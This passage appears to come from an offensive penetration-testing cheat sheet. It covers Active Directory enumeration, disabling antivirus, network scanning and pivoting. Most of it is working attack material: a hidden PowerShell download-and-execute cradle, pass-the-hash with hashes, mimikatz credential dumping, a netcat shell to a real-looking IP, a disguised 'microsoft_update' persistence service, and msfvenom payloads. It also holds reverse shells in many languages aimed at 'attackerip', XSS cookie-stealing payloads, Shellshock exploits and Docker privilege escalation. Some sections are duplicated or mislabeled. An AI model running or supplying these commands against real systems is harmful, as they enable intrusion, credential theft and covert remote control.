127.0.0.1. Did you want ReverseListenerBindAddress? [*] Started reverse TCP handler on 127.0.0.1:1233 [*] Using URL: http://0.0.0.0:8080/gOAr7kQOTh msf exploit(web_delivery) > [*] Local IP: http://10.2.15.194:8080/gOAr7kQOTh [*] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -c $j=new-object net.webclient;$j.proxy=[Net.WebRequest]::GetSystemWebProxy();$j.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $j.downloadstring('http://127.0.0.1:8080/gOAr7kQOTh'); ``` Copy the powershell command into the cmd opened with pth_winexe # Active Directory ``` # current domain info [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain() # domain trusts ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships() # current forest info [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest() # get forest trust relationships ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships() # get DCs of a domain nltest /dclist:offense.local net group "domain controllers" /domain # get DC for currently authenticated session nltest /dsgetdc:offense.local # get domain trusts from cmd shell nltest /domain_trusts # get user info nltest /user:"spotless" # get DC for currently authenticated session set l # get domain name and DC the user authenticated to klist # get all logon sessions. Includes NTLM authenticated sessions klist sessions # kerberos tickets for the session klist # cached krbtgt klist tgt # whoami on older Windows systems set u ``` ## BloodHound ``` powershell-import /path/to/BloodHound.ps1 powershell Get-BloodHoundData | Export-BloodHoundCSV ``` # Symantec AV Bypass ``` During our latest pentest, we faced shitty AV problem since we couldn't get any meterpreter session with psexec cuz of Symatec AV, So we would like to share our solution for this problem: First We Need to connect with the local admin as system using pth (local hash extracted with bkhive and samdump2) $./pth-winexe -U DOMAIN.COM/USERNAME%cc5e9acbad1b25c9aad3b435b51404ee:996e6760cddd8815a2c24a110cf040fb //10.0.42.154 cmd --system Then let's Stop the AV Service cd "C:\Program Files\Symantec\Symantec Endpoint Protection" smc.exe -stop Nice now we got rid of the AV, however our payload and IP was still blocked since they use an IPS so we used a reverse_https listener and psexec_psh to bypass it: mohamed@KeyStrOke:~$ msfconsole use exploit/windows/smb/psexec_psh set payload windows/meterpreter/reverse_https set StageEncoder x86/shikata_ga_nai set EnableStageEncoding true set SMBUSER USERNAME set SMBPASS cc5e9acbad1b25c9aad3b435b51404ee:996e6760cddd8815a2c24a110cf040fb set lhost IP set lport 443 exploit -j and BOOM :D Server username: NT AUTHORITY\SYSTEM Enjoy your Session ``` # Kiwi collect credentials ``` meterpreter > load kiwi meterpreter > cred_all ``` # Network ### Nmap Full Web Vulnerable Scan ``` cd /usr/share/nmap/scripts/ wget http://www.computec.ch/projekte/vulscan/download/nmap_nse_vulscan-2.0.tar.gz && tar xzf nmap_nse_vulscan-2.0.tar.gz nmap -sS -sV --script=vulscan/vulscan.nse target nmap -sS -sV --script=vulscan/vulscan.nse โ€“script-args vulscandb=scipvuldb.csv target nmap -sS -sV --script=vulscan/vulscan.nse โ€“script-args vulscandb=scipvuldb.csv -p80 target nmap -PN -sS -sV --script=vulscan โ€“script-args vulscancorrelation=1 -p80 target nmap -sV --script=vuln target nmap -PN -sS -sV --script=all โ€“script-args vulscancorrelation=1 target ``` ### Dirb Dir Bruteforce ``` dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt ``` ### Nikto web server scanner ``` nikto -C all -h http://IP ``` ### WordPress Scanner ``` git clone https://github.com/wpscanteam/wpscan.git && cd wpscan ./wpscan โ€“url http://IP/ โ€“enumerate p ``` ### HTTP Fingerprinting ``` wget http://www.net-square.com/_assets/httprint_linux_301.zip && unzip httprint_linux_301.zip cd httprint_301/linux/ ./httprint -h http://IP -s signatures.txt ``` ### WordPress Scanner ``` git clone https://github.com/wpscanteam/wpscan.git && cd wpscan ./wpscan โ€“url http://IP/ โ€“enumerate p ``` ### SKIP Fish Scanner ``` skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP ``` ### Nmap Ports Scan ``` 1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys) 1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys) 2)fargement 3)data packed โ€“ like orginal one not scan packet 4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan โ€” nmap -sI ip target 5)nmap โ€“source-port 53 target nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f โ€“mtu=24 โ€“data-length=1337 -T2 target ( Randomize scan form diff IP) nmap -Pn -T2 -sV โ€“randomize-hosts IP1,IP2 nmap โ€“script smb-check-vulns.nse -p445 target (using NSE scripts) nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5) nmap -sA -PN -sN target nmap -sS -sV -T5 -F -A -O target (version detection) nmap -sU -v target (Udp) nmap -sU -P0 (Udp) nmap -sC 192.168.31.10-12 (all scan default) ``` ### NC Scanning ``` nc -v -w 1 target -z 1-1000 for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done ``` ### Unicornscan ``` us -H -msf -Iv 192.168.56.101 -p 1-65535 us -H -mU -Iv 192.168.56.101 -p 1-65535 -H resolve hostnames during the reporting phase -m scan mode (sf - tcp, U - udp) -Iv - verbose ``` ### Xprobe2 OS fingerprinting ``` xprobe2 -v -p tcp:80:open IP ``` ### Samba Enumeration ``` nmblookup -A target smbclient //MOUNT/share -I target -N rpcclient -U "" target enum4linux target ``` ### SNMP Enumeration ``` snmpget -v 1 -c public IP snmpwalk -v 1 -c public IP snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP ``` ### Windows Useful cmds ``` net localgroup Users net localgroup Administrators search dir/s *.doc system("start cmd.exe /k $cmd") sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore /c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 23.92.17.103 7779 mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" Procdump.exe -accepteula -ma lsass.exe lsass.dmp mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords" C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits ``` ### PuTTY Link tunnel ``` Forward remote port to local address cmd.exe /c echo y | .\plink.exe -P 22 -l <USER> -pw "password" -R PORT_TO_FORWARD:127.0.0.1:ATTACKER_PORT <IP> 2>&1 ``` ### Meterpreter portfwd ``` # https://www.offensive-security.com/metasploit-unleashed/portfwd/ # forward remote port to local address meterpreter > portfwd add โ€“l 3389 โ€“p 3389 โ€“r 172.16.194.141 kali > rdesktop 127.0.0.1:3389 ``` ### Enable RDP Access ``` reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0 netsh firewall set service remoteadmin enable netsh firewall set service remotedesktop enable ``` ### Turn Off Windows Firewall ``` netsh firewall set opmode disable ``` ### Meterpreter VNC\RDP ``` git clone https://github.com/gentilkiwi/mimikatz.git privilege::debug sekurlsa::logonPasswords full ``` ### Mimikatz use ``` net user test 1234 /add net localgroup administrators test /add ``` ### Passing the Hash ``` git clone https://github.com/byt3bl33d3r/pth-toolkit pth-winexe -U hash //IP cmd or apt-get install freerdp-x11 xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP or meterpreter > run post/windows/gather/hashdump Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit meterpreter > shell ``` ### Hashcat password cracking ``` hashcat -m 400 -a 0 hash /root/rockyou.txt ``` ### Netcat examples ``` c:> nc -l -p 31337 #nc 192.168.0.10 31337 c:> nc -v -w 30 -p 31337 -l < secret.txt #nc -v -w 2 192.168.0.10 31337 > secret.txt ``` ### Banner grabbing with NC ``` nc 192.168.0.10 80 GET / HTTP/1.1 Host: 192.168.0.10 User-Agent: Mozilla/4.0 Referrer: www.example.com <enter> <enter> ``` ### Window reverse shell ``` c:>nc -Lp 31337 -vv -e cmd.exe nc 192.168.0.10 31337 c:>nc example.com 80 -e cmd.exe nc -lp 80 nc -lp 31337 -e /bin/bash nc 192.168.0.10 31337 nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000 ``` ### Find SUID\SGID root files ``` # Find SUID root files find / -user root -perm -4000 -print # Find SGID root files: find / -group root -perm -2000 -print # Find SUID and SGID files owned by anyone: find / -perm -4000 -o -perm -2000 -print # Find files that are not owned by any user: find / -nouser -print # Find files that are not owned by any group: find / -nogroup -print # Find symlinks and what they point to: find / -type l -ls ``` ### Python shell ``` python -c 'import pty;pty.spawn("/bin/bash")' ``` ### Python\Ruby\PHP HTTP Server ``` python2 -m SimpleHTTPServer python3 -m http.server ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 8888, :DocumentRoot => Dir.pwd).start" php -S 0.0.0.0:8888 ``` ### Get PIDs of process ``` fuser -nv tcp 80 fuser -k -n tcp 80 ``` ### Hydra rdp Bruteforce ``` hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp ``` ### Mount Remote Windows Share ``` smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw ``` ### Compiling Exploit in Kali ``` gcc -m32 -o output32 hello.c (32 bit) gcc -m64 -o output hello.c (64 bit) ``` ### Compiling Windows Exploits on Kali ``` c:>nc -Lp 31337 -vv -e cmd.exe nc 192.168.0.10 31337 c:>nc example.com 80 -e cmd.exe nc -lp 80 nc -lp 31337 -e /bin/bash nc 192.168.0.10 31337 nc -vv -r(random) -w(wait) 1 192.168.0.10 -z(i/o error) 1-1000 ``` ### Window reverse shell ``` wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download wine mingw-get-setup.exe select mingw32-base cd /root/.wine/drive_c/windows wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip cd /root/.wine/drive_c/MinGW/bin wine gcc -o ability.exe /tmp/exploit.c -lwsock32 wine ability.exe ``` ### NASM Commands ``` nasm -f bin -o payload.bin payload.asm nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload ``` ### SSH Pivoting ``` ssh -D 127.0.0.1:1080 -p 22 user@IP Add socks4 127.0.0.1 1080 in /etc/proxychains.conf proxychains commands target ``` ### SSH Pivoting from One Network to Another ``` ssh -D 127.0.0.1:1080 -p 22 user1@IP1 Add socks4 127.0.0.1 1080 in /etc/proxychains.conf proxychains ssh -D 127.0.0.1:1081 -p 22 user1@IP2 Add socks4 127.0.0.1 1081 in /etc/proxychains.conf proxychains commands target ``` ### Pivoting Using metasploit ``` route add X.X.X.X 255.255.255.0 1 use auxiliary/server/socks4a run proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E or # https://www.offensive-security.com/metasploit-unleashed/pivoting/ meterpreter > ipconfig IP Address : 10.1.13.3 meterpreter > run autoroute -s 10.1.13.0/24 meterpreter > run autoroute -p 10.1.13.0 255.255.255.0 Session 1 meterpreter > Ctrl+Z msf auxiliary(tcp) > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST 10.1.13.2 msf exploit(psexec) > exploit meterpreter > ipconfig IP Address : 10.1.13.2 ``` ### Exploit-DB search using CSV File ``` git clone https://github.com/offensive-security/exploit-database.git cd exploit-database ./searchsploit โ€“u ./searchsploit apache 2.2 ./searchsploit "Linux Kernel" cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "<|<=" | sort -k3 ``` ### MSF Payloads ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> X > system.exe msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 R > exploit.php msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -a x86 --platform win -f asp -o file.asp msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c ``` ### MSF Linux Reverse Meterpreter Binary ``` msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=443 -e -f elf -a x86 --platform linux -o shell ``` ### MSF Reverse Shell (C Shellcode) ``` msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c ``` ### MSF Reverse Shell Python Script ``` msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=443 -o shell.py ``` ### MSF Reverse ASP Shell ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp -a x86 --platform win -o shell.asp ``` ### MSF Reverse Bash Shell ``` msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.sh ``` ### MSF Reverse PHP Shell ``` msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -o shell.php add <?php at the beginning perl -i~ -0777pe's/^/<?php \n/' shell.php ``` ### MSF Reverse Win Bin ``` msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe -a x86 --platform win -o shell.exe ``` ### Linux Security Commands ``` # find programs with a set uid bit find / -uid 0 -perm -4000 # find things that are world writable find / -perm -o=w # find names with dots and spaces, there shouldnโ€™t be any find / -name " " -print find / -name ".." -print find / -name ". " -print find / -name " " -print # find files that are not owned by anyone find / -nouser # look for files that are unlinked lsof +L1 # get information about procceses with open ports lsof -i # look for weird things in arp arp -a # look at all accounts including AD getent passwd # look at all groups and membership including AD getent group # list crontabs for all users including AD for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done # generate random passwords cat /dev/urandom| tr -dc โ€˜a-zA-Z0-9-_!@#$%^&*()_+{}|:<>?=โ€™|fold -w 12| head -n 4 # find all immutable files, there should not be any find . | xargs -I file lsattr -a file 2>/dev/null | grep โ€˜^โ€ฆ.iโ€™ # fix immutable files chattr -i file ``` ### Win Buffer Overflow Exploit Commands ``` msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c COMMONLY USED BAD CHARACTERS: \x00\x0a\x0d\x20 For http request \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_) # Useful Commands: pattern create pattern offset (EIP Address) pattern offset (ESP Address) add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode ) !pvefindaddr pattern_create 5000 !pvefindaddr suggest !pvefindaddr modules !pvefindaddr nosafeseh !mona config -set workingfolder C:\Mona\%p !mona config -get workingfolder !mona mod !mona bytearray -b "\x00\x0a" !mona pc 5000 !mona po EIP !mona suggest ``` ### SEH - Structured Exception Handling ``` # https://en.wikipedia.org/wiki/Microsoft-specific_exception_handling_mechanisms#SEH !mona suggest !mona nosafeseh nseh="\xeb\x06\x90\x90" (next seh chain) iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN) ``` ### ROP (DEP) ``` # https://en.wikipedia.org/wiki/Return-oriented_programming # https://en.wikipedia.org/wiki/Data_Execution_Prevention !mona modules !mona ropfunc -m *.dll -cpb "\x00\x09\x0a" !mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest) ``` ### ASLR - Address space layout randomization ``` # https://en.wikipedia.org/wiki/Address_space_layout_randomization !mona noaslr ``` ### EGG Hunter techniques ``` # https://www.corelan.be/index.php/2010/01/09/exploit-writing-tutorial-part-8-win32-egg-hunting/ # http://www.fuzzysecurity.com/tutorials/expDev/4.html !mona jmp -r esp !mona egg -t lxxl \xeb\xc4 (jump backward -60) buff=lxxllxxl+shell !mona egg -t 'w00t' ``` ### GDB Debugger Commands ``` # Setting Breakpoint break *_start # Execute Next Instruction next step n s # Continue Execution continue c # Data checking 'REGISTERS' and 'MEMORY' # Display Register Values: (Decimal,Binary,Hex) print /d โ€“> Decimal print /t โ€“> Binary print /x โ€“> Hex O/P : (gdb) print /d $eax $17 = 13 (gdb) print /t $eax $18 = 1101 (gdb) print /x $eax $19 = 0xd (gdb) # Display values of specific memory locations command : x/nyz (Examine) n โ€“> Number of fields to display ==> y โ€“> Format for output ==> c (character) , d (decimal) , x (Hexadecimal) z โ€“> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit) ``` ### BASH Reverse Shell ``` bash -i >& /dev/tcp/X.X.X.X/443 0>&1 exec /bin/bash 0&0 2>&0 exec /bin/bash 0&0 2>&0 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 0<&196;exec 196<>/dev/tcp/attackerip/4444; sh <&196 >&196 2>&196 exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done exec 5<>/dev/tcp/attackerip/4444 cat <&5 | while read line; do $line 2>&5 >&5; done # or: while read line 0<&5; do $line 2>&5 >&5; done /bin/bash -i > /dev/tcp/attackerip/8080 0<&1 2>&1 /bin/bash -i > /dev/tcp/X.X.X.X/443 0<&1 2>&1 ``` ### PERL Reverse Shell ``` perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' # for win platform perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};โ€™ ``` ### RUBY Reverse Shell ``` ruby -rsocket -e 'exit if fork;c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' # for win platform ruby -rsocket -e 'c=TCPSocket.new("attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ruby -rsocket -e 'f=TCPSocket.open("attackerip","443").to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' ``` ### PYTHON Reverse Shell ``` python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` ### PHP Reverse Shell ``` php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i <&3 >&3 2>&3");' ``` ### JAVA Reverse Shell ``` r = Runtime.getRuntime() p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) p.waitFor() ``` ### NETCAT Reverse Shell ``` nc -e /bin/sh attackerip 4444 nc -e /bin/sh 192.168.37.10 443 # If the -e option is disabled, try this # mknod backpipe p && nc attackerip 443 0<backpipe | /bin/bash 1>backpipe /bin/sh | nc attackerip 443 rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/ # If you have the wrong version of netcat installed, try rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f ``` ### TELNET Reverse Shell ``` # If netcat is not available or /dev/tcp mknod backpipe p && telnet attackerip 443 0<backpipe | /bin/bash 1>backpipe ``` ### XTERM Reverse Shell ``` # Start an open X Server on your system (:1 โ€“ which listens on TCP port 6001) apt-get install xnest Xnest :1 # Then remember to authorise on your system the target IP to connect to you xterm -display 127.0.0.1:1 # Run this INSIDE the spawned xterm on the open X Server xhost +targetip # Then on the target connect back to the your X Server xterm -display attackerip:1 /usr/openwin/bin/xterm -display attackerip:1 or $ DISPLAY=attackerip:0 xterm ``` ### XSS Cheat Codes ``` https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet ("< iframes > src=http://IP:PORT </ iframes >") <script>document.location=http://IP:PORT</script> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//โ€“></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ";!โ€“"<XSS>=&amp;amp;{()} <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG """><SCRIPT>alert("XSS")</SCRIPT>""> <IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;> <IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041> <IMG SRC="jav ascript:alert('XSS');"> perl -e 'print "<IMG SRC=javascript:alert(\"XSS\")>";' > out <BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert("XSS")> (">< iframes http://google.com < iframes >) <BODY BACKGROUND="javascript:alert('XSS')"> <FRAMESET><FRAME SRC=โ€javascript:alert('XSS');"></FRAMESET> "><script >alert(document.cookie)</script> %253cscript%253ealert(document.cookie)%253c/script%253e "><s"%2b"cript>alert(document.cookie)</script> %22/%3E%3CBODY%20onload=โ€™document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)'%3E <img src=asdf onerror=alert(document.cookie)> ``` ### SSH Over SCTP (With Socat) ``` # on remote server # assuming you want the SCTP socket to listen on port 80/SCTP and sshd is on 22/TCP $ socat SCTP-LISTEN:80,fork TCP:localhost:22 # localhost # replace SERVER_IP with IP of listening server, and 80 with whatever port the SCTP listener is on :) $ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80 # create socks proxy # replace username and -p port value as needed... $ ssh -lusername localhost -D 8080 -p 1337 ``` ### Install Metasploit Community Edition in Kali 2.0 ``` # github urls https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run && chmod +x metasploit-latest-linux-x64-installer.run && ./metasploit-latest-linux-x64-installer.run # create user $ /opt/metasploit/createuser [*] Please enter a username: root [*] Creating user 'root' with password 'LsRRV[I^5' ... # activate your metasploit license https://localhost:3790 # update metasploite $ /opt/metasploit/app/msfupdate # use msfconsole $ /opt/metasploit/app/msfconsole ``` ### Tor Nat Traversal ``` # install to server $ apt-get install tor torsocks # bind ssh to tor service port 80 # /etc/tor/torrc SocksPolicy accept 127.0.0.1 SocksPolicy accept 192.168.0.0/16 Log notice file /var/log/tor/notices.log RunAsDaemon 1 HiddenServiceDir /var/lib/tor/ssh_hidden_service/ HiddenServicePort 80 127.0.0.1:22 PublishServerDescriptor 0 $ /etc/init.d/tor start $ cat /var/lib/tor/ssh_hidden_service/hostname 3l5zstvt1zk5jhl662.onion # ssh connect from client $ apt-get install torsocks $ torsocks ssh [email protected] -p 80 ``` ### DNS brute forcing with fierce ``` # http://ha.ckers.org/fierce/ $ ./fierce.pl -dns example.com $ ./fierce.pl โ€“dns example.com โ€“wordlist myWordList.txt ``` ### Metagoofil metadata gathering tool ``` # http://www.edge-security.com/metagoofil.php #automate search engine document retrieval and analysis. It also has the capability to provide MAC # addresses, username listings, and more $ python metagoofil.py -d example.com -t doc,pdf -l 200 -n 50 -o examplefiles -f results.html ``` ### A best NMAP scan strategy ``` # A best nmap scan strategy for networks of all sizes # Host Discovery - Generate Live Hosts List $ nmap -sn -T4 -oG Discovery.gnmap 192.168.56.0/24 $ grep "Status: Up" Discovery.gnmap | cut -f 2 -d ' ' > LiveHosts.txt # Port Discovery - Most Common Ports # http://nmap.org/presentations/BHDC08/bhdc08-slides-fyodor.pdf $ nmap -sS -T4 -Pn -oG TopTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -oN TopUDP -iL LiveHosts.txt $ nmap -sS -T4 -Pn --top-ports 3674 -oG 3674 -iL LiveHosts.txt # Port Discovery - Full Port Scans (UDP is very slow) $ nmap -sS -T4 -Pn -p 0-65535 -oN FullTCP -iL LiveHosts.txt $ nmap -sU -T4 -Pn -p 0-65535 -oN FullUDP -iL LiveHosts.txt # Print TCP\UDP Ports $ grep "open" FullTCP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "T:"$0}' $ grep "open" FullUDP|cut -f 1 -d ' ' | sort -nu | cut -f 1 -d '/' |xargs | sed 's/ /,/g'|awk '{print "U:"$0}' # Detect Service Version $ nmap -sV -T4 -Pn -oG ServiceDetect -iL LiveHosts.txt # Operating System Scan $ nmap -O -T4 -Pn -oG OSDetect -iL LiveHosts.txt # OS and Service Detect $ nmap -O -sV -T4 -Pn -p U:53,111,137,T:21-25,80,139,8080 -oG OS_Service_Detect -iL LiveHosts.txt ``` ### Nmap โ€“ Techniques for Avoiding Firewalls ``` # fragmentation $ nmap -f # change default MTU size number must be a multiple of 8 (8,16,24,32 etc) $ nmap --mtu 24 # Generates a random number of decoys $ nmap -D RND:10 [target] # Manually specify the IP addresses of the decoys $ nmap -D decoy1,decoy2,decoy3 etc. # Idle Zombie Scan, first t need to find zombie ip $ nmap -sI [Zombie IP] [Target IP] # Source port number specification $ nmap --source-port 80 IP # Append Random Data to scan packages $ nmap --data-length 25 IP # MAC Address Spoofing, generate different mac for host pc $ nmap --spoof-mac Dell/Apple/3Com IP ``` ### Exploit servers to Shellshock ``` # A tool to find and exploit servers vulnerable to Shellshock # https://github.com/nccgroup/shocker $ ./shocker.py -H 192.168.56.118 --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose # cat file $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80 # bind shell $ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80 # reverse Shell $ nc -l -p 443 $ echo "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.56.103 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc 192.168.56.118 80 ``` ### Root with Docker ``` # get root with docker # user must be in docker group ek@victum:~/docker-test$ id uid=1001(ek) gid=1001(ek) groups=1001(ek),114(docker) ek@victum:~$ mkdir docker-test ek@victum:~$ cd docker-test ek@victum:~$ cat > Dockerfile FROM debian:wheezy ENV WORKDIR /stuff RUN mkdir -p $WORKDIR VOLUME [ $WORKDIR ] WORKDIR $WORKDIR << EOF ek@victum:~$ docker build -t my-docker-image . ek@victum:~$ docker run -v $PWD:/stuff -t my-docker-image /bin/sh -c \ 'cp /bin/sh /stuff && chown root.root /stuff/sh && chmod a+s /stuff/sh' ./sh whoami # root ek@victum:~$ docker run -v /etc:/stuff -t my-docker-image /bin/sh -c 'cat /stuff/shadow' ``` ### Tunneling Over DNS to Bypass Firewall ``` # Tunneling Data and Commands Over DNS to Bypass Firewalls # dnscat2 supports "download" and "upload" commands for getting files (data and programs) to and from # the victimโ€™s host. # server (attacker) $ apt-get update $ apt-get -y install ruby-dev git make g++ $ gem install bundler $ git clone https://github.com/iagox86/dnscat2.git $ cd dnscat2/server $ bundle install $ ruby ./dnscat2.rb dnscat2> New session established: 16059 dnscat2> session -i 16059 # client (victum) # https://downloads.skullsecurity.org/dnscat2/ # https://github.com/lukebaggett/dnscat2-powershell $ dnscat --host <dnscat server_ip> ``` ### Compile Assemble code ``` nasm -f elf32 simple32.asm -o simple32.o ld -m elf_i386 simple32.o simple32 nasm -f elf64 simple.asm -o simple.o ld simple.o -o simple ``` ### Pivoting to Internal Network Via Non Interactive Shell ``` # generate ssh key with shell $ wget -O - -q "http://domain.tk/sh.php?cmd=whoami" $ wget -O - -q "http://domain.tk/sh.php?cmd=ssh-keygen -f /tmp/id_rsa -N \"\" " $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa" # add tempuser at attacker ps $ useradd -m tempuser $ mkdir /home/tempuser/.ssh && chmod 700 /home/tempuser/.ssh $ wget -O - -q "http://domain.tk/sh.php?cmd=cat /tmp/id_rsa" > /home/tempuser/.ssh/authorized_keys $ chmod 700 